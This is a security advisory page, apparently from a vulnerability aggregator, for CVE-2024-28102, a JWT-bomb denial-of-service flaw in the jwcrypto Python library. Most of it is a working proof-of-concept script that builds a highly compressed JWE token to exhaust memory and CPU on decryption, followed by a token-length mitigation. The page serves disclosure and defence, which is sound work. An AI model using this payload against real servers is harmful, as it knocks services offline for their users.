CVE-2024-28102: JWCrypto vulnerable to JWT bomb Attack in `deserialize` function

First published: Wed Mar 06 2024(Updated: )

## Affected version Vendor: https://github.com/latchset/jwcrypto Version: 1.5.5 ## Description An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this Token, it will consume a lot of memory and processing time. ## Poc ```python from jwcrypto import jwk, jwe from jwcrypto.common import json_encode, json_decode import time public_key = jwk.JWK() private_key = jwk.JWK.generate(kty='RSA', size=2048) public_key.import_key(**json_decode(private_key.export_public())) payload = '{"u": "' + "u" * 400000000 + '", "uu":"' + "u" * 400000000 + '"}' protected_header = { "alg": "RSA-OAEP-256", "enc": "A256CBC-HS512", "typ": "JWE", "zip": "DEF", "kid": public_key.thumbprint(), } jwetoken = jwe.JWE(payload.encode('utf-8'), recipient=public_key, protected=protected_header) enc = jwetoken.serialize(compact=True) print("-----uncompress-----") print(len(enc)) begin = time.time() jwetoken = jwe.JWE() jwetoken.deserialize(enc, key=private_key) print(time.time() - begin) print("-----compress-----") payload = '{"u": "' + "u" * 400000 + '", "uu":"' + "u" * 400000 + '"}' protected_header = { "alg": "RSA-OAEP-256", "enc": "A256CBC-HS512", "typ": "JWE", "kid": public_key.thumbprint(), } jwetoken = jwe.JWE(payload.encode('utf-8'), recipient=public_key, protected=protected_header) enc = jwetoken.serialize(compact=True) print(len(enc)) begin = time.time() jwetoken = jwe.JWE() jwetoken.deserialize(enc, key=private_key) print(time.time() - begin) ``` It can be found that when processing Tokens with similar lengths, the processing time of compressed tokens is significantly longer. <img width="172" alt="image" src="https://github.com/latchset/jwcrypto/assets/133195620/23193327-3cd7-499a-b5aa-28c56af92785"> ## Mitigation To mitigate this vulnerability, it is recommended to limit the maximum token length to 250K. This approach has also been adopted by the JWT library System.IdentityModel.Tokens.Jwt used in Microsoft Azure [1], effectively preventing attackers from exploiting this vulnerability with high compression ratio tokens. ## References [1] [CVE-2024-21319](https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/security/advisories/GHSA-8g9c-28fc-mcx2)

Credit: security-advisories@github.com security-advisories@github.com

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Read MoreStart Free Trial

• agent/first-publish-date
• agent/weakness
• agent/title
• agent/type
• collector/github-advisory-latest
• source/GitHub
• alias/GHSA-j857-7rvv-vj97
• alias/CVE-2024-28102
• agent/software-canonical-lookup
• collector/nvd-api
• source/NVD
• collector/nvd-cve
• agent/author
• collector/github-advisory
• agent/event
• collector/epss-latest
• source/FIRST
• agent/epss
• agent/severity
• agent/softwarecombine
• agent/description
• collector/redhat-bugzilla
• source/Red Hat
• agent/references
• collector/mitre-cve
• source/MITRE
• agent/last-modified-date
• agent/trending
• agent/tags
• agent/source
• package-manager/pip
• package-manager/redhat